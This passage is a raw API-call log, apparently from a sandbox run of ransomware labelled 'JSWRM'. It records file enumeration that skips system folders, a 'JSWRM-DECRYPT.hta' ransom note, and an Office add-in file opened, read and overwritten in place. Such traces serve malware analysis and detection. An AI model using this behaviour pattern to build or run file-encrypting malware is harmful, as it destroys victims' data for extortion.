lpString2=".") returned 1 [0125.447] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.447] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x163ef7bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4658, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.447] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.447] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.447] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.447] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.447] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.447] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.447] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.447] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.448] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.448] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0125.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240f98, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0125.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2412e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2473c0 [0125.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0125.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0125.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0125.448] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x416e6cb5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x416e6cb5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x416e6cb5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0125.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0125.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0125.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0125.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0125.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0125.449] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aa3169, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aa3169, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aa3169, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11ac8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.449] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0125.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0125.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0125.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0125.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0125.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e570 [0125.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0125.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0125.449] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aa3169, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.449] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.449] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0125.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0125.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0125.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0125.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0125.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0125.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.450] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x59b433, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59b433, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59b433, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4710, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.450] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0125.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0125.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0125.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0125.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244840 [0125.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0125.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.451] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x160a83ba, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x160a83ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1611aacd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f53a, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sr-latn.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2=".") returned 1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2="..") returned 1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2="...") returned 1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2="windows") returned -1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2="recovery") returned -1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2="perflogs") returned 1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2="documents and settings") returned 1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2="system volume information") returned -1 [0125.451] lstrcmpiW (lpString1="PowerViewRes.sr-latn.xap", lpString2="msocache") returned 1 [0125.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-latn.xap", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0125.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-latn.xap", cchWideChar=24, lpMultiByteStr=0x2411c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sr-latn.xap", lpUsedDefaultChar=0x0) returned 24 [0125.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-latn.xap", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0125.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0125.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-latn.xap", cchWideChar=24, lpMultiByteStr=0x241128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sr-latn.xap", lpUsedDefaultChar=0x0) returned 24 [0125.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0125.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244840 | out: hHeap=0x1e0000) returned 1 [0125.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0125.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-latn\\PowerViewRes.sr-latn.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn\\powerviewres.sr-latn.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.453] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=324922) returned 1 [0125.453] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.454] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.490] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.490] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.491] CloseHandle (hObject=0x338) returned 1 [0125.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0125.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 